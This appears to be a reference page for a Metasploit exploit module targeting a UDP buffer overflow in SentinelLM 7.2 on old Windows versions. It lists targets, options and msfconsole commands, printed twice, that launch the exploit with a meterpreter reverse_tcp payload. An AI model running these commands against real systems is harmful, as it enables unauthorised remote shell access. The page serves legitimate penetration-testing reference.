SentinelLM UDP Buffer Overflow
This module exploits a simple stack buffer overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particular popular with academic products. If the wrong target value is selected, the service will crash and not restart.
Exploit Rank
- Average
Exploit Authors
- hdm < hdm [at] metasploit.com >
Vulnerability References
Exploit Targets
- 0 - SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6
- 1 - SentinelLM 7.2.0.0 Windows 2000 English
- 2 - SentinelLM 7.2.0.0 Windows 2000 German
- 3 - SentinelLM 7.2.0.0 Windows XP English SP0/SP1
- 4 - SentinelLM 7.2.0.0 Windows 2003 English SP0
Exploit Development
Similar Exploit Modules
- exploit/windows/license/calicclnt_getconfig
- exploit/windows/license/calicserv_getconfig
- exploit/windows/license/flexnet_lmgrd_bof
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/license/sentinel_lm7_udp
msf exploit(sentinel_lm7_udp) > show payloads
msf exploit(sentinel_lm7_udp) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(sentinel_lm7_udp) > set LHOST [MY IP ADDRESS]
msf exploit(sentinel_lm7_udp) > set RHOST [TARGET IP]
msf exploit(sentinel_lm7_udp) > show targets
msf exploit(sentinel_lm7_udp) > set TARGET [TARGET ID]
msf exploit(sentinel_lm7_udp) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/license/sentinel_lm7_udp
msf exploit(sentinel_lm7_udp) > show payloads
msf exploit(sentinel_lm7_udp) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(sentinel_lm7_udp) > set LHOST [MY IP ADDRESS]
msf exploit(sentinel_lm7_udp) > set RHOST [TARGET IP]
msf exploit(sentinel_lm7_udp) > show targets
msf exploit(sentinel_lm7_udp) > set TARGET [TARGET ID]
msf exploit(sentinel_lm7_udp) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 5093) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
